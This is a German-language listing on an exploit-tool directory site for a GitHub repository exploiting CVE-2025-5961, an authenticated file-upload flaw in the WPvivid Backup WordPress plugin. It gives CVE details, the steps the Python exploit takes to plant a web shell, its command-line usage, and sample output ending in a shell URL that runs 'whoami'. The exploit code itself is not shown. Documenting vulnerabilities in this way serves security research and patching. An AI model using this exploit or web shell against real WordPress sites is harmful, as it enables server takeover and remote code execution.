Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5961 — Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifiziert (Administrator+) Beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-5961
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifiziert (Administrator+) Beliebiger Datei-Upload

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifizierter (Administrator+) beliebiger Datei-Upload

📈 Diese Sicherheitslücke betrifft ein Plugin mit über 700.000+ Installationen


📝 CVE-Details

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (Hoch)
  • Veröffentlicht: 3. Juli 2025

🔍 Beschreibung

Das Migration, Backup, Staging – WPvivid Backup & Migration-Plugin für WordPress ist anfällig für beliebige Datei-Uploads aufgrund fehlender Dateityp-Validierung in der wpvivid_upload_import_files-Funktion in allen Versionen bis einschließlich 0.9.116.

Dies ermöglicht authentifizierten Angreifern (Administrator-Ebene und höher) das Hochladen beliebiger Dateien auf den Server, was potenziell die Ausführung von Remote-Code ermöglicht.


🧰 Skript

Dieses Repository enthält ein Exploit-Skript für CVE-2025-5961, geschrieben in Python, welches:

  • Überprüft die Plugin-Version.
  • Meldet sich als Administrator an.
  • Extrahiert den erforderlichen Nonce von der Plugin-Seite.
  • Lädt eine Web-Shell-Nutzlast hoch.
  • Gibt die URL zum Zugriff auf die Shell aus.

🖥️ Beispielverwendung

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Verwendung

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Ausgabebeispiel

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Haftungsausschluss

Dieses Skript wird ausschließlich zu Lehr- und Forschungszwecken bereitgestellt.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


✍️ Von

Khaled Alenazi (Nxploited)
🌐 GitHub


Tool herunterladen